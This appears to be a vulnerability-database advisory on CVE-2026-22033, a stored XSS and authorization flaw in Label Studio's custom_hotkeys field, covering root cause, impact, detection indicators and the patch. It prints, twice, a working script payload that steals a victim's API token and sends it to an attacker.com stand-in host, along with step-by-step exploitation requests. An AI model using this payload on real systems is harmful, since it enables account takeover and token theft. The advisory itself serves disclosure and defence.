
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-22033 is a stored Cross-Site Scripting (XSS) vulnerability chained with an Insecure Direct Object Reference (IDOR) / improper authorization flaw in HumanSignal Label Studio, an open-source data labeling platform. It affects all versions up to and including 1.22.0 (with the advisory specifically noting version 1.21.0 as confirmed affected). Discovered and reported by researcher david3107 (DCODX-AI), the vulnerability was published on January 12, 2026. It carries a CVSS v4.0 base score of 8.6 (High) and a CVSS v3.1 base score of 5.4 (Medium) (GitHub Advisory, HumanSignal Advisory).
The root cause is improper neutralization of user-controlled input (CWE-79) combined with improper authorization (CWE-285/CWE-284). In templates/base.html, the application renders the user.custom_hotkeys field directly into a JavaScript variable using {{ user.custom_hotkeys|json_dumps_ensure_ascii|safe }}. The json_dumps_ensure_ascii filter performs json.dumps() without escaping < and > characters, and the |safe filter suppresses Django's automatic HTML escaping, allowing injected script tags to break out of the JavaScript context. An authenticated attacker can update their own custom_hotkeys via PATCH /api/users/{id}/ with a malicious payload (e.g., "INJ;</script><script>fetch('/api/current-user/token').then(r=>r.json()).then(t=>fetch('https://attacker.com/?t='+t.token))/*xx": {"key": "x", "active": true}). Because the /api/current-user/token endpoint lacks robust CSRF protection, the injected script can silently exfiltrate any victim's API token when they load any page using base.html (GitHub Advisory, Patch Commit).
Successful exploitation enables full account takeover of any user who loads a page rendered with templates/base.html while the malicious hotkey payload is active. The injected script can silently steal API tokens from the /api/current-user/token endpoint, enabling unauthorized access to internal and external APIs, data exfiltration, token reset, and privilege escalation. If the victim is an administrator or privileged user, the impact extends to wide system compromise, and cross-user token exfiltration could affect the entire organization's application and data (GitHub Advisory, HumanSignal Advisory).
A proof-of-concept exploit is publicly available in the GitHub security advisory, with the full exploit chain confirmed manually by the reporter. The vulnerability requires only a low-privileged authenticated account to inject the payload, and victim interaction is limited to simply loading any page in the application. There is no evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA KEV catalog. The EPSS score is approximately 0.041% (0.014% per GitHub Advisory), placing it in the lower percentiles for near-term exploitation probability (GitHub Advisory, HumanSignal Advisory).
GET /user/login/.GET /api/current-user/whoami and note the id field in the JSON response (e.g., "id": 25).custom_hotkeys field that breaks out of the JavaScript variable context and injects a script to exfiltrate the victim's API token. Example payload key: INJ;</script><script>fetch('/api/current-user/token').then(r=>r.json()).then(t=>fetch('https://attacker.com/?t='+t.token))/*xxPATCH /api/users/{your_id}/ with Content-Type: application/json and the crafted custom_hotkeys body. Confirm the malicious string is stored in the response.templates/base.html (e.g., /, /user/account/), the stored XSS payload executes in their browser context./api/current-user/token and sends it to the attacker-controlled server, enabling full account takeover and unauthorized API access (GitHub Advisory, HumanSignal Advisory)./api/current-user/token originating from browser sessions not initiated by the token owner; unusual API calls to attacker-controlled endpoints containing token parameters.PATCH /api/users/{id}/ requests with unusually long or encoded custom_hotkeys values containing <script>, fetch(, or similar JavaScript constructs; repeated GET /api/current-user/token requests from multiple different user sessions in a short timeframe.custom_hotkeys field in the user database containing JavaScript code fragments, closing </script> tags, or fetch() calls when inspected directly.The fix was merged on December 29, 2025 (commit ea2462b) and published in the security advisory on January 12, 2026. The patch adds an escape_lt_gt template filter to properly escape < and > characters in the custom_hotkeys output before rendering: {{ user.custom_hotkeys|json_dumps_ensure_ascii|escape_lt_gt|safe }}. Users should upgrade Label Studio to a version after 1.22.0 that includes this fix. As additional hardening measures, implement a strict Content Security Policy (CSP) header, review and restrict user privileges, monitor for suspicious API token usage, and consider network segmentation to limit API token exposure (Patch Commit, HumanSignal Advisory).
The vulnerability was discovered and reported by researcher david3107 under the DCODX-AI team, with a detailed write-up published at infinitsec.net shortly after disclosure. The advisory was reviewed and published by HumanSignal on January 12, 2026, with the fix having been merged into the development branch on December 29, 2025. No significant broader media coverage or notable community controversy has been identified beyond the standard vulnerability disclosure channels (GitHub Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."